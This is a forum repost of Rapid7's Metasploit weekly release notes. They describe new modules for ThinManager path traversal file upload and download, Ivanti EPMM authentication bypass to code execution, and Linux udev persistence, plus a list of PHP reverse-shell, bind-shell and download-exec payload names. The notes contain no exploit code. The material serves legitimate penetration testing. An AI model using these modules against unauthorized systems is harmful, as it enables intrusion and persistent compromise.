National Cyber Warfare Foundation (NCWF)

Metasploit Wrap-up 06 06 25


0 user ratings
2025-06-06 22:54:11
milo
Red Team (CNA)
This release adds targeting ThinManager vulnerabilities (CVE-2023-27855, CVE-2023-2917, CVE-2023-27856), a udev persistence module for Linux, an Ivanti EPMM authentication bypass and remote code execution module (CVE-2025-4427, CVE-2025-4428), PHP payload adapters, and more

ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload


Metasploit Wrap-up 06/06/25

Authors: Michael Heinzl and Tenable

Type: Auxiliary

Pull request: #20138 contributed by h4x-x0r

Path: admin/networking/thinmanager_traversal_upload

AttackerKB reference: CVE-2023-2917


Description: Adds an auxiliary module that targets CVE-2023-27855, a path traversal vulnerability in ThinManager <= v13.0.1 to upload an arbitrary file to the target system as SYSTEM.


ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload


Authors: Michael Heinzl and Tenable

Type: Auxiliary

Pull request: #20141 contributed by h4x-x0r

Path: admin/networking/thinmanager_traversal_upload2

AttackerKB reference: CVE-2023-2917


Description: Adds a module targeting CVE-2023-2917, a path traversal vulnerability in ThinManager <= v13.1.0, to upload an arbitrary file as system.


ThinManager Path Traversal (CVE-2023-27856) Arbitrary File Download


Authors: Michael Heinzl and Tenable

Type: Auxiliary

Pull request: #20139 contributed by h4x-x0r

Path: gather/thinmanager_traversal_download

AttackerKB reference: CVE-2023-27856


Description: Adds an auxiliary module targeting CVE-2023-27856, a path traversal vulnerability in ThinManager <= v13.0.1, to download an arbitrary file from the target system.


udev persistence


Author: Julien Voisin

Type: Exploit

Pull request: #19472 contributed by jvoisin

Path: linux/local/udev_persistence


Description: This adds a module for udev persistence for Linux targets. The module requires root access because it creates udev rules. It will create a rule under the directory /lib/udev/rules./ and a malicious binary containing the payload. Successful exploitation requires the presence of the at binary on the system.


Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution


Authors: CERT-EU, Piotr Bazydlo, Sonny Macdonald, and remmons-r7

Type: Exploit

Pull request: #20265 contributed by remmons-r7

Path: multi/http/ivanti_epmm_rce_cve_2025_4427_4428

AttackerKB reference: CVE-2025-4428


Description: Adds a module chaining CVE-2025-4427 and CVE-2025-4428 an authentication flaw allowing unauthenticated access to an administrator web API endpoint allowing for code execution via expression language injection on many versions of MobileIron Core (rebranded as Ivanti EPMM).


PHP Exec, PHP Command Shell, Bind TCP (via Perl)


Authors: Samy [email protected], Spencer McIntyre, cazz [email protected], and msutovsky-r7

Type: Payload (Adapter)

Pull request: #19976 contributed by msutovsky-r7


Description: This enables creation of PHP payloads wrapped around bash / sh commands.


This adapter adds the following payloads:



  • cmd/unix/php/bind_perl

  • cmd/unix/php/bind_perl_ipv6

  • cmd/unix/php/bind_php

  • cmd/unix/php/bind_php_ipv6

  • cmd/unix/php/download_exec

  • cmd/unix/php/exec

  • cmd/unix/php/meterpreter/bind_tcp

  • cmd/unix/php/meterpreter/bind_tcp_ipv6

  • cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid

  • cmd/unix/php/meterpreter/bind_tcp_uuid

  • cmd/unix/php/meterpreter/reverse_tcp

  • cmd/unix/php/meterpreter/reverse_tcp_uuid

  • cmd/unix/php/meterpreter_reverse_tcp

  • cmd/unix/php/reverse_perl

  • cmd/unix/php/reverse_php

  • cmd/unix/php/shell_findsock


Enhancements and features (3)



  • #19900 from jvoisin - Updates multiple modules notes to now includes additional AKA (Also Known As) references for EquationGroup codenames.

  • #20263 from cdelafuente-r7 - Updates Metasploit to register VulnAttempts for both Exploit and Auxiliary modules.

  • #20277 from adfoster-r7 - Add support for Ruby 3.2.8.


Bugs fixed (7)



  • #20218 from jheysel-r7 - Fixes an issue in the web crawler's canonicalize method, which previously resulted in incorrect URIs being returned.

  • #20246 from bcoles - Fixes an issue within msfvenom when using zutto_dekiru encoder on a raw payload.

  • #20258 from zeroSteiner - Updates the datastore options in auxiliary/admin/ldap/shadow_credentials to reference the new LDAP datastore names.

  • #20260 from zeroSteiner - Updates the auxiliary/admin/ldap/change_password module to use the new LDAP datastore options.

  • #20273 from JohannesLks - This fixes multiple issues in the post/windows/manage/remove_host module that would occur when a line had multiple names on it or used tab characters instead of spaces.

  • #20275 from msutovsky-r7 - This fixes a bug in the auxiliary/scanner/sap/sap_router_info_request module what would cause it to crash when a corrupted packet was received.

  • #20281 from JohannesLks - This fixes an issue in the post/windows/manage/resolve_host module that would occur if the system wasn't installed to C:\.


Get it


As always, you can update to the latest Metasploit Framework with msfupdate

and you can get more details on the changes since the last blog post from

GitHub:



If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro




Source: Rapid7
Source Link: https://blog.rapid7.com/2025/06/06/metasploit-wrapup-76/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Red Team (CNA)



Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.